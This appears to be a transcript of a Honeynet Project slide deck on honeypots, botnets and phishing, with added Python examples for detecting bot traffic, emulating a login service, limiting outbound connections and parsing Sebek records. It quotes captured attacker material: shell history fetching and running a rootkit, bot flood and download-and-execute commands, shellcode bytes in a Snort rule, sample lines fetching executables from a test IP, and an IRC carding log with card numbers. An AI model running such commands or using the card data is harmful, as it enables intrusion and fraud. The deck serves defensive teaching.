Honeypot Project

Published in: Technology, Business
  • Please send ppt of honeypot to me at
  • Please send me this ppt on sarishti_kapoor@yahoo.com. I would be grateful to you. :)
  • How to download this ppt... please help, it's urgent

    1. Honeynets and The Honeynet Project
    2. Speaker
    3. Purpose
       • To explain our organization, our value to you, and our research.
    4. Agenda
       • The Honeynet Project and Research Alliance
       • The Threat
       • How Honeynets Work
       • Learning More
    5. Honeynet Project
    6. Problem
       • How can we defend against an enemy when we don't even know who the enemy is?
    7. Mission Statement
       • To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned.
    8. Our Goal
       • Improve the security of the Internet at no cost to the public.
         ◦ Awareness: raise awareness of the threats that exist.
         ◦ Information: for those already aware, teach and inform about the threats.
         ◦ Research: give organizations the capability to learn more on their own.
    9. Honeynet Project
       • Non-profit (501(c)(3)) organization with a Board of Directors.
       • Funded by sponsors.
       • Global set of diverse skills and experiences.
       • Open source: all research and findings are shared at no cost to the public.
       • Deploys networks around the world to be hacked.
       • Everything captured is happening in the wild.
       • Nothing to sell.
    10. Honeynet Research Alliance
       • Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies.
       • http://www.honeynet.org/alliance/
    11. Alliance Members
       • South Florida Honeynet Project
       • Georgia Technical Institute
       • Azusa Pacific University
       • USMA Honeynet Project
       • Pakistan Honeynet Project
       • Paladion Networks Honeynet Project (India)
       • Internet Systematics Lab Honeynet Project (Greece)
       • Honeynet.BR (Brazil)
       • UK Honeynet
       • French Honeynet Project
       • Italian Honeynet Project
       • Portugal Honeynet Project
       • German Honeynet Project
       • Spanish Honeynet Project
       • Singapore Honeynet Project
       • China Honeynet Project
    12. The Threat
    13. What we have captured
       • The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
       • Little has yet been captured on advanced threats; few honeynets to date have been designed to capture them.
    14. The Threat
       • Hundreds of scans a day.
       • Fastest manual compromise of a honeypot: 15 minutes (by a worm: under 60 seconds).
       • Life expectancy of a vulnerable Win32 system is under three hours; of a vulnerable Linux system, three months.
       • Primarily cyber-crime, focused on Win32 systems and their users.
       • Attackers can control thousands of systems (botnets).
    15. The Threat
    16. The Motive
       • Motives vary, but more and more are criminally motivated.
       • Several years ago, hackers hacked computers. Now, criminals hack computers.
       • Fraud, extortion and identity theft have been around for centuries; the net just makes them easier.
    17. DDoS for Money
       J4ck: why don't you start charging for packet attacks?
       J4ck: "give me x amount and I'll take bla bla offline for this amount of time"
       J1LL: it was illegal last I checked
       J4ck: heh, then everything you do is illegal. Why not make money off of it?
       J4ck: I know plenty of people that'd pay exorbitant amounts for packeting
    18. The Target
       • The mass users.
       • Tend to be non-security aware, making them easy targets.
       • Economies of scale (it's a global target).
    19. Interesting Trends
       • Attacks often originate from economically depressed countries (Romania is an example).
       • Attacks are shifting from the computer to the user (computers are getting harder to hack).
       • Attackers continue to get more sophisticated.
    20. The Tools
       • Attacks used to be primarily worms and autorooters.
       • Newer tools include botnets and phishing.
       • Tools are constantly advancing.
    21. The Old Days (shell history captured on a compromised honeypot)
       Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
       Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y
       Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
       Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
       Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
       Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
       Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
       Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
       Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
       Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
       Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
    22. Botnets
       • Large networks of hacked systems.
       • Often thousands, if not tens of thousands, of hacked systems under the control of a single user.
       • Automated commands are used to control the 'zombies'.
    23. How They Work
       • After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.
       • The binary is started and connects to the hard-coded master IRC server.
       • Often a dynamic DNS name is used rather than a hard-coded IP address, so the bot can be easily relocated.
       • Using a specially crafted nickname like USA|743634, the bot joins the master's channel, sometimes using a password to keep strangers out of the channel.
    24. 80% of traffic
       • Port 445/TCP
       • Port 139/TCP
       • Port 135/TCP
       • Port 137/UDP
       • Infected systems are most often WinXP-SP1 and Win2000.
    25. Bots (sample command set)
       ddos.synflood [host] [time] [delay] [port]                          starts a SYN flood
       ddos.httpflood [url] [number] [referrer] [recursive = true||false]  starts an HTTP flood
       scan.listnetranges                                                  list scanned netranges
       scan.start                                                          starts all enabled scanners
       scan.stop                                                           stops all scanners
       http.download                                                       download a file via HTTP
       http.execute                                                        updates the bot via the given HTTP URL
       http.update                                                         executes a file from a given HTTP URL
       cvar.set spam_aol_channel [channel]                                 AOL spam: channel name
       cvar.set spam_aol_enabled [1/0]                                     AOL spam: enabled?
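The bot behaviour on slides 23 and 25 (a COUNTRY|digits nickname, a keyed channel join, dotted command families such as ddos.* and scan.*) is exactly what a honeynet analyst greps for in captured IRC traffic. The following is an added example, not Honeynet Project code: a small classifier over a constructed IRC capture. The sample lines, the nickname regex and the optional "." or "!" command prefix are my assumptions about how such traffic looks.

```python
import re
from collections import defaultdict

# Constructed IRC traffic as a honeynet might capture it (not a real capture).
SAMPLE_IRC = [
    "NICK USA|743634",
    "USER botz 0 * :botz",
    "JOIN #c0ntrol s3cretk3y",
    ":m4ster!op@203.0.113.5 PRIVMSG #c0ntrol :.scan.start",
    ":m4ster!op@203.0.113.5 PRIVMSG #c0ntrol :.ddos.synflood 198.51.100.20 600 5 80",
    ":m4ster!op@203.0.113.5 PRIVMSG #c0ntrol :.http.download http://198.51.100.9/u.exe c:\\u.exe 1",
    ":alice!u@192.0.2.10 PRIVMSG #chat :anyone seen the new kernel?",
    "NICK alice",
]

# Nicknames of the form COUNTRY|digits (e.g. USA|743634), as described on slide 23.
BOT_NICK_RE = re.compile(r"^[A-Z]{2,4}\|\d{4,}$")

# Command families from slide 25 (ddos.*, scan.*, http.*, cvar.*); the optional
# "." or "!" prefix is an assumption about how operators trigger them.
BOT_CMD_RE = re.compile(r"^[.!]?(ddos|scan|http|cvar)\.([a-z_]+)(?:\s+(.*))?$")

PRIVMSG_RE = re.compile(r"^(?::(?P<src>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")


def parse_line(line):
    """Classify one raw IRC line. Returns a dict describing what was found, or None."""
    line = line.strip()
    if line.startswith("NICK "):
        nick = line.split(None, 1)[1]
        return {"kind": "nick", "nick": nick, "bot_like": bool(BOT_NICK_RE.match(nick))}
    if line.startswith("JOIN "):
        parts = line.split()
        return {"kind": "join", "channel": parts[1], "key": parts[2] if len(parts) > 2 else None}
    m = PRIVMSG_RE.match(line)
    if m:
        cmd = BOT_CMD_RE.match(m.group("text"))
        if cmd:
            return {"kind": "command", "channel": m.group("target"),
                    "family": cmd.group(1), "name": cmd.group(2), "args": cmd.group(3) or ""}
        return {"kind": "chat", "channel": m.group("target")}
    return None


def analyze(lines):
    """Summarise bot indicators across a capture: suspicious nicks, keyed channel
    joins, and C&C commands grouped by the channel they were issued in."""
    report = {"bot_nicks": [], "keyed_joins": [], "commands": defaultdict(list)}
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        if ev["kind"] == "nick" and ev["bot_like"]:
            report["bot_nicks"].append(ev["nick"])
        elif ev["kind"] == "join" and ev["key"]:
            report["keyed_joins"].append(ev["channel"])
        elif ev["kind"] == "command":
            report["commands"][ev["channel"]].append(f'{ev["family"]}.{ev["name"]}')
    report["commands"] = dict(report["commands"])
    return report


if __name__ == "__main__":
    print(analyze(SAMPLE_IRC))
```

Any one indicator alone is weak (people do use odd nicknames and keyed channels); the value is in the combination, a bot-style NICK followed by a keyed JOIN and then dotted commands in the same channel, which is the sequence slide 23 describes.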
    26. Numbers
       • Over a 4-month period:
         ◦ More than 100 botnets were tracked.
         ◦ One channel had over 200,000 IP addresses.
         ◦ One computer was compromised by 16 bots.
         ◦ Estimated over 1 million systems compromised.
    27. Botnet Economy
       • Botnets are sold or rented.
       • Saw botnets being stolen from each other.
       • Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes, since they are considered valuable information.
    28. Phishing
       • Social-engineer victims into giving up valuable information (login, password, credit card number, etc.).
       • Easier to hack the user than the computer.
       • New attacks against instant messaging.
       • http://www.antiphishing.org
    29. The Sting
    30. Getting the Info
    31. Infrastructure
       • Attackers build networks of thousands of hacked systems (often botnets).
       • Upload pre-made packages for phishing.
       • Use the platforms for sending out spoofed email.
       • Use the platforms for hosting false websites.
    32. A Phishing Rootkit (directory listing)
       -rw-r--r-- 1 free web  14834 Jun 17 13:16 ebay only
       -rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
       -rw-r--r-- 1 free web   7517 Jun 11 11:53 html1.zip
       -rw-r--r-- 1 free web  10383 Jul  3 19:07 index.html
       -rw-r--r-- 1 free web    413 Jul 18 22:09 index.zip
       -rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
       -rw-r--r-- 1 free web   8192 Jun 12 07:18 massmail.zip
       -rw-r--r-- 1 free web  12163 Jun  9 01:31 send.php
       -rw-r--r-- 1 free web   2094 Jun 20 11:49 sendspamAOL1.tgz
       -rw-r--r-- 1 free web   2173 Jun 14 22:58 sendspamBUN1.tgz
       -rw-r--r-- 1 free web   2783 Jun 15 00:21 sendspamBUNzip1.zip
       -rw-r--r-- 1 free web   2096 Jun 16 18:46 sendspamNEW1.tgz
       -rw-r--r-- 1 free web   1574 Jul 11 01:08 sendbank1.tgz
       -rw-r--r-- 1 free web   2238 Jul 18 23:07 sendbankNEW.tgz
       -rw-r--r-- 1 free web  83862 Jun  9 09:56 spamz.zip
       -rw-r--r-- 1 free web  36441 Jul 18 00:52 usNEW.zip
       -rw-r--r-- 1 free web  36065 Jul 11 17:04 bank1.tgz
       drwxr-xr-x 2 free web     49 Jul 16 12:26 banka
       -rw-r--r-- 1 free web 301939 Jun  8 13:17 www1.tar.gz
       -rw-r--r-- 1 free web 327380 Jun  7 16:24 www1.zip
    33. Credit Cards Exchanging (IRC log)
       04:55:16 COCO_JAA: !cc
       04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
       04:55:42 COCO_JAA: !cclimit 4407070000588951
       04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
       04:56:55 COCO_JAA: !cardablesite
       04:57:22 COCO_JAA: !cardable electronics
       04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9)
       04:58:09 COCO_JAA: !cclimit 4234294391131136
       04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
    34. The Future
       • Hacking is profitable, and it is difficult to get caught.
       • Expect more attacks to focus on the end user or the client.
       • Expect things to get worse; the bad guys adapt faster.
    35. Honeynets
    36. Honeypots
       • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
       • It has no production value, so anything going to or from a honeypot is likely a probe, attack or compromise.
       • Its primary value to most organizations is information.
    37. Advantages
       • Collect small data sets of high value.
       • Reduce false positives.
       • Catch new attacks (the false negatives of signature-based tools).
       • Work in encrypted or IPv6 environments.
       • Simple concept requiring minimal resources.
    38. Disadvantages
       • Limited field of view (microscope).
       • Risk (mainly with high-interaction honeypots).
    39. Types
       • Low-interaction
         ◦ Emulates services, applications, and OSs.
         ◦ Low risk and easy to deploy/maintain, but captures limited information.
       • High-interaction
         ◦ Real services, applications, and OSs.
         ◦ Captures extensive information, but high risk and time-intensive to maintain.
    40. Examples of Honeypots (ordered from low to high interaction)
       • BackOfficer Friendly
       • KFSensor
       • Honeyd
       • Honeynets
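A minimal low-interaction honeypot of the kind slide 39 describes, as an added example (not code from the Honeynet Project or from any of the tools listed on slide 40): a fake login prompt that emulates just enough of a telnet-style service to record what the attacker sends and never lets anyone in. Because nothing real sits behind the prompt, the risk is low, and because everything that arrives is logged, the data set is small but high-value, which is the trade-off on slides 37 to 39. The banner, the listening port 2323 and the three-attempt limit are my assumptions.

```python
import datetime
import socket
import threading

BANNER = b"Welcome to srv01\r\n\r\nlogin: "   # assumed banner; pick one that fits your network


class FakeLoginService:
    """Emulates a telnet-style login dialogue. Every login fails, every attempt is
    recorded. One instance per connection; feed() is pure so it can be tested offline."""

    MAX_ATTEMPTS = 3   # assumed: disconnect after three failed logins, like a real telnetd

    def __init__(self, peer):
        self.peer = peer
        self.state = "user"      # waiting for a username, then "pass" for a password
        self.user = None
        self.attempts = 0
        self.buf = b""
        self.events = []         # one dict per login attempt: when, who, what
        self.closed = False

    def feed(self, data):
        """Consume bytes from the attacker; return the bytes to send back."""
        self.buf += data
        out = b""
        while b"\n" in self.buf and not self.closed:
            line, self.buf = self.buf.split(b"\n", 1)
            out += self._handle_line(line.rstrip(b"\r"))
        return out

    def _handle_line(self, line):
        if self.state == "user":
            self.user = line
            self.state = "pass"
            return b"Password: "
        # state == "pass": record the pair, always reject
        self.attempts += 1
        self.events.append({
            "ts": datetime.datetime.now(datetime.timezone.utc).isoformat(),
            "peer": self.peer,
            "user": self.user.decode("latin-1", "replace"),
            "password": line.decode("latin-1", "replace"),
        })
        self.state = "user"
        if self.attempts >= self.MAX_ATTEMPTS:
            self.closed = True
            return b"\r\nLogin incorrect\r\nConnection closed.\r\n"
        return b"\r\nLogin incorrect\r\nlogin: "


def handle_conn(conn, addr, sink):
    """Drive one TCP connection through the emulator and hand its events to sink."""
    svc = FakeLoginService(f"{addr[0]}:{addr[1]}")
    try:
        conn.sendall(BANNER)
        while not svc.closed:
            data = conn.recv(1024)
            if not data:
                break
            conn.sendall(svc.feed(data))
    finally:
        conn.close()
        sink.extend(svc.events)


def serve(host="127.0.0.1", port=2323, sink=None):
    """Listen on an unprivileged port (assumed 2323); redirect 23 to it if you want it
    to look like the real thing. Runs until killed."""
    sink = [] if sink is None else sink
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    while True:
        conn, addr = srv.accept()
        threading.Thread(target=handle_conn, args=(conn, addr, sink), daemon=True).start()


if __name__ == "__main__":
    serve()
```

The emulator never executes anything the attacker sends, which is what keeps it low-interaction; the price, as slide 39 says, is that it learns nothing about what the attacker would have done after logging in. A high-interaction honeynet answers that question, at the cost of the data control and data capture machinery described later in the deck.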
    41. Honeynets
       • A high-interaction honeypot designed to capture in-depth information.
       • The information has different value to different organizations.
       • It's an architecture you populate with live systems, not a product or software.
       • Any traffic entering or leaving is suspect.
    42. How it works
       • A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
         ◦ Data Control
         ◦ Data Capture
         ◦ Data Analysis
       • http://www.honeynet.org/papers/honeynet/
    43. Honeynet Architecture
    44. Data Control
       • Mitigate the risk of the honeynet being used to harm non-honeynet systems.
       • Count outbound connections.
       • IPS (Snort-Inline).
       • Bandwidth throttling.
    45. No Data Control
    46. Data Control
    47. Snort-Inline (the first rule only alerts; the second also rewrites the payload in flight, byte for byte, so the stream stays intact but the exploit no longer works)
       alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";)
       alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named"; flags:A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)
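Slides 44 and 47 describe two data-control mechanisms: counting outbound connections and rewriting an exploit payload in flight. The following added example models both in Python; it is not the Honeywall's or Snort-inline's code. The per-protocol limits are assumed values, named after the Honeywall's HwTCPRATE-style knobs; the byte rewrite is the one from the Snort-inline rule above, which must replace exactly as many bytes as it matches.

```python
import time
from collections import deque


class OutboundLimiter:
    """Count connections the honeypot initiates, per protocol, and block once the
    hourly limit is reached. Modelled on the Honeywall's HwTCPRATE/HwUDPRATE/
    HwICMPRATE settings; the limits passed in are assumed values, not defaults."""

    WINDOW = 3600.0   # seconds; the Honeywall counts per hour

    def __init__(self, limits):
        self.limits = limits                     # e.g. {"tcp": 30, "udp": 20, "icmp": 50}
        self.seen = {p: deque() for p in limits}  # timestamps of allowed connections
        self.blocked = []                        # audit trail of what was dropped

    def allow(self, proto, dst, now=None):
        """Return True if this new outbound connection may leave the honeynet."""
        now = time.time() if now is None else now
        q = self.seen[proto]
        while q and now - q[0] >= self.WINDOW:   # expire entries older than the window
            q.popleft()
        if len(q) >= self.limits[proto]:
            self.blocked.append((now, proto, dst))
            return False
        q.append(now)
        return True


# The Snort-inline replace from slide 47: int 0x80 (CD 80) becomes 00 00 and /bin/sh
# becomes /ben/sh. Match and replacement are the same length (14 bytes), so TCP
# sequence numbers and checksums need no further adjustment beyond the rewrite.
REWRITES = [
    (b"\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh",
     b"\x00\x00\xe8\xd7\xff\xff\xff/ben/sh"),
]
for _m, _r in REWRITES:
    assert len(_m) == len(_r), "replace: must preserve payload length"


def neutralize_payload(payload):
    """Apply the in-line rewrites; return (new_payload, number_of_hits)."""
    hits = 0
    for match, repl in REWRITES:
        n = payload.count(match)
        if n:
            payload = payload.replace(match, repl)
            hits += n
    return payload, hits


if __name__ == "__main__":
    lim = OutboundLimiter({"tcp": 30, "udp": 20, "icmp": 50})
    t0 = 1_700_000_000.0
    verdicts = [lim.allow("tcp", "203.0.113.9:80", now=t0 + i) for i in range(35)]
    print("tcp allowed:", verdicts.count(True), "blocked:", verdicts.count(False))
    pkt = b"\x90" * 8 + b"\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" + b"\x00"
    new, hits = neutralize_payload(pkt)
    print(hits, new)
```

The two controls complement each other: the limiter caps how much damage a compromised honeypot can do outbound without revealing itself (the first few connections, which is what the attacker needs to fetch tools, still work), while the rewrite lets the attacker's exploit arrive and fail for no obvious reason rather than being dropped, which is harder to attribute to an IPS.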
    48. Data Capture
       • Capture all activity at a variety of levels:
       • Network activity.
       • Application activity.
       • System activity.
    49. Sebek
       • Hidden kernel module that captures all host activity.
       • Dumps the activity to the network.
       • The attacker cannot sniff this traffic: the module hides its own packets, recognized by magic number and destination port, from the host.
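Added example for the Sebek slide, not Sebek's own code: it packs and parses Sebek-style records, shows why a sniffer run by the attacker on the honeypot does not see them (frames matching the magic number and destination port are filtered out before they reach the host's packet taps), and reassembles the captured read() data into the commands the attacker typed. The record layout, the magic number 0xD0D0D0D0, the port 1101 and the keystroke sample are my assumptions for this example.

```python
import struct

# Assumed constants: a Sebek deployment is configured with a site-specific magic
# number and destination UDP port; these two values are made up for the example.
SEBEK_MAGIC = 0xD0D0D0D0
SEBEK_PORT = 1101

# Record header modelled on the Sebek v2 layout (an assumption for this example):
# magic, version, type, counter, time_sec, time_usec, pid, uid, fd, comm[12], data_len
HDR = struct.Struct("!IHHIIIIII12sI")
TYPE_READ = 0


def pack_record(counter, pid, uid, fd, comm, data, sec=0, usec=0):
    """Build one Sebek-style record: header followed by the captured read() data."""
    hdr = HDR.pack(SEBEK_MAGIC, 2, TYPE_READ, counter, sec, usec,
                   pid, uid, fd, comm.encode()[:12].ljust(12, b"\0"), len(data))
    return hdr + data


def parse_records(payload):
    """Yield a dict for every record in a datagram payload; stop on a bad magic."""
    off = 0
    while off + HDR.size <= len(payload):
        magic, ver, typ, ctr, sec, usec, pid, uid, fd, comm, ln = HDR.unpack_from(payload, off)
        if magic != SEBEK_MAGIC:
            break
        off += HDR.size
        yield {"counter": ctr, "type": typ, "pid": pid, "uid": uid, "fd": fd,
               "comm": comm.rstrip(b"\0").decode(), "data": payload[off:off + ln]}
        off += ln


def host_sniffer_view(frames):
    """What a sniffer on the honeypot would see: the module drops its own frames
    (matching magic + destination port) before they reach the host's taps.
    frames are dicts {'dst_port': int, 'payload': bytes} (constructed, not pcap)."""
    visible = []
    for f in frames:
        is_sebek = (f["dst_port"] == SEBEK_PORT and len(f["payload"]) >= 4
                    and struct.unpack("!I", f["payload"][:4])[0] == SEBEK_MAGIC)
        if not is_sebek:
            visible.append(f)
    return visible


def reassemble_keystrokes(records):
    """Join per-(pid, fd) read() data into lines: the commands the attacker typed,
    recovered even if the session itself was encrypted on the wire."""
    partial, lines = {}, {}
    for r in sorted(records, key=lambda r: r["counter"]):
        if r["type"] != TYPE_READ:
            continue
        key = (r["pid"], r["fd"])
        partial[key] = partial.get(key, b"") + r["data"]
        while b"\n" in partial[key]:
            line, partial[key] = partial[key].split(b"\n", 1)
            lines.setdefault(key, []).append(line.rstrip(b"\r").decode("latin-1"))
    return lines


# Constructed sample: an attacker typing one command, one keystroke per read(),
# plus an unrelated HTTP frame that the host's sniffer should still see.
KEYSTROKES = b"wget http://198.51.100.9/x.tgz\n"
SAMPLE_FRAMES = [{"dst_port": SEBEK_PORT,
                  "payload": pack_record(i, 4242, 0, 0, "bash", bytes([c]))}
                 for i, c in enumerate(KEYSTROKES)]
SAMPLE_FRAMES.append({"dst_port": 80, "payload": b"GET / HTTP/1.0\r\n\r\n"})


def demo():
    """Return (frames visible to the attacker's sniffer, lines the Honeywall reassembles)."""
    visible = host_sniffer_view(SAMPLE_FRAMES)
    records = [r for f in SAMPLE_FRAMES if f["dst_port"] == SEBEK_PORT
               for r in parse_records(f["payload"])]
    return visible, reassemble_keystrokes(records)


if __name__ == "__main__":
    vis, typed = demo()
    print(len(vis), "frame(s) visible on the host;", typed)
```

Two practical caveats follow from the design. The hiding only works if every Sebek-equipped honeypot on the segment shares the same magic number and port, and those values are exactly what anti-honeynet tools (slide 70) look for, so a deployment should change them from whatever the build ships with. And because reassembly keys on (pid, fd) and the record counter, gaps in the counter are worth alerting on: they mean records were lost, or the module was tampered with.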
    50. Sebek Architecture
    51. Honeywall CDROM
       • An attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
       • May 2003: released Eeyore.
       • May 2005: released Roo.
    52. Eeyore Problems
       • OS too minimized, almost crippled; could not easily add functionality.
       • Difficult to modify, since it was a LiveCD.
       • Limited distributed capabilities.
       • No GUI administration.
       • No data analysis.
       • No international or SCSI support.
    53. Roo Honeywall CDROM
       • Based on Fedora Core 3.
       • Vastly improved hardware and international support.
       • Automated, headless installation.
       • New Walleye interface for web-based administration and data analysis.
       • Automated system updating.
    54. Installation
       • Just insert the CDROM and boot; it installs to the local hard drive.
       • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.
       • Following installation, you get a command prompt and the system is ready to configure.
    55. First Boot
    56. Install
    57. Configure
    58. 3 Methods to Maintain
       • Command Line Interface
       • Dialog Interface
       • Web GUI (Walleye)
    59. Command Line Interface
       • Local or SSH access only.
       • Use the utility hwctl to modify configurations and restart services, for example to set the outbound TCP connection limit:
         # hwctl HwTCPRATE=30
    60. Dialog Menu
    61. Data Administration
    62. Data Analysis
       • The most critical part: the purpose of a honeynet is to gather information and learn.
       • Need a method to analyze all the different elements of information.
       • Walleye is the new solution; it comes with the CDROM.
    63. Walleye
    64. Data Analysis
    65. Data Analysis Flows
    66. Data Analysis Details
    67. Processes
    68. Files
    69. Distributed Capabilities
    70. Issues
       • Requires extensive resources to properly maintain.
       • Detection and anti-honeynet technologies have been introduced.
       • Can be used to attack or harm other, non-honeynet systems.
       • Privacy can be a potential issue.
    71. Legal Contact for .mil / .gov
       • Department of Justice, Computer Crime and Intellectual Property Section.
         ◦ Paul Ohm
           ▪ Number: (202) 514.1026
           ▪ E-Mail: [email_address]
    72. Learning More
    73. Our Website
       • Know Your Enemy papers.
       • Scan of the Month challenges.
       • Latest tools and technologies.
       • http://www.honeynet.org/
    74. Our Book
       http://www.honeynet.org/book
    75. Sponsoring YOU?
       Advanced Network Management Lab
    76. How to Sponsor
       • Sponsor development of a new tool.
       • Sponsor authorship of a new research paper.
       • Sponsor research and development.
       • Buy our book.
       <project@honeynet.org>
       http://www.honeynet.org/funds/
    77. Conclusion
       • The Honeynet Project is a non-profit research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
    78.
       • http://www.honeynet.org
         ◦ <project@honeynet.org>
